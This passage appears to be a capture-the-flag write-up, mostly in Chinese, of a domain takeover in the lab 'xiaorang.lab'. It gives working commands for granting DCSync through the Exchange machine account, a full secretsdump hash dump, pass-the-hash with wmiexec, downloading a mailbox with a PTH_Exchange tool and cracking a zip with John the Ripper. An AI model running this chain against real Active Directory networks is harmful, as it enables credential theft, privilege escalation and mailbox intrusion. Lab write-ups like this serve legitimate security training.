                    [+] XIAORANG-WIN16$  ==>>>   Windows Server 2016 Datacenter  [10.0 (14393)]  ==>>>  172.22.3.2
[i] ADCS has not found!
[i] Domain Exchange Server: 1 found
                    [+] XIAORANG-EXC01$  ==>>>  Exchange Server 2016  ==>>>  172.22.3.9
[i] Domain All DNS:
                    [+] Domain Dns 3 found,Saved in All_DNS.csv
[i] Domain Trusts: 0 found
[i] SPN: 59 found
[i] Domain GPOs: 2 found
[i] Domain Admins: 1 users found
                    [+]Administrator
[i] Enterprise Admins: 1 users found
                    [+]Administrator
[i] administrators: 1 users found
                    [+]Administrator
[i] Backup Operators: 0 users found
[i] Users: 27 found
[i] User with Mail: 23 found
[i] Only_name_and_Useful_Users: 14 found
[i] Only_admincount=1_andUseful_Users: 1 found
[i] Locked Users: 0 found
[i] Disabled Users: 13 found
[i] Users with passwords not set to expire: 13 found
[i] Domain Computers: 3 found
[i] Only_name_and_Useful_computers: 3 found
[i] Groups: 69 found
[i] Domain OUs: 2 found
[i] LAPS Not found
[i] LAPS passwords: 0 found
[i] SensitiveDelegate Users: 0 found
[i] AsReproast Users: 0 found
[i] Kerberoast Users: 1 found
                    [+] CN=krbtgt,CN=Users,DC=xiaorang,DC=lab  ==>>>  kadmin/changepw
[i] SIDHistory Users: 0 found
[i] CreatorSID Users: 0 found
[i] RBCD Users: 0 found
[i] Unconstrained Deligation Users: 0 found
[i] Constrained Deligation Users: 0 found
[i] Krbtgt password last set time: 2022-10-23 14:40:45 +0800 CST
[i] CSVs written to 'csv' directory in C:\Users\calm\Desktop
[i] Execution took 2.1943333s

WriteDACL

Exchange机器账户默认对域内成员具有 WriteDACL 权限, 因此可以写 DCSync
exchange机器账户隶属于Exchange Windows Permissions这个组中，而这个组具有write 域内acl权限，所以可以设置刚刚通过mimikatz拿到的域内用户Zhangtong的dcsync属性。

proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :55c05b3a95ba11efa84aa33e20861e6f -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

这边报错换个工具

proxychains python3 bloodyAD.py -d xiaorang.lab -u 'XIAORANG-EXC01$' -p :55c05b3a95ba11efa84aa33e20861e6f --host 172.22.3.2 add dcsync Zhangtong

打DSCync获取域控hash再打pth

proxychains impacket-secretsdump xiaorang.lab/XIAORANG-EXC01\$@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc

xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:6a049c17ae6f214d0ce0bb958be94c7a:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:33cd42e4c654333ef6118bea55f376ba:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:b9df9852037915b5f26114769ace114a:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:b0d89dce8c89f4a43758961e8f782174:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:74d63202f94c220e09056568feafa894:::
[*] Cleaning up...

打pth

proxychains python3 wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2

type C:\Users\Administrator\flag\flag.txt

接着打pth另一台机器结果没有flag，smb连过去Lumia桌面发现有压缩包（爆破不了），最后发现是dump邮件https://github.com/Jumbo-WJB/PTH_Exchange

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

得到手机号和用户名，爆破一下

zip2john secret.zip >zip.txt
john --wordlist=1.txt zip.txt

18763918468